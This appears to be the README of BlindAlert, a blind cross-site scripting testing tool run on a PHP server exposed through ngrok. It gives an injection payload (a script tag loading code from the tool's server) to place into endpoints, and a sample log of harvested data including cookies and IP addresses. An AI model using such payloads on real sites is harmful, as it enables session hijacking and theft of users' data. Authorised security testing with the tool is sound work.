Easy Blind Cross-site Scripting testing tool.
- PHP >= 5.7
- Running server or ngrok (access localhost over the internet)
Either you can install in your local system and access through the ngrok or install into a live server.
To install BlindAlert, simply clone the repo
git clone https://github.com/mdhama/blindAlert.git
To Run on local server
cd blindAlert
php -S localhost:80
Now open https://localhost in your browser.
Over the internet using ngrok
./ngrok http 80
- Create a JS payload and start blindly putting into endpoints :-)
e.g. "><script src="https://localhost"></script>
- When it executes sucessfully, it creates an output file within the same project directory.
Example output file.txt:
origin: https://example
host: example
url: https://example/user/posts
referrer: https://example/user
user-agent: <user-agent>
cookies: <document.cookie>
ip: <ip_addess>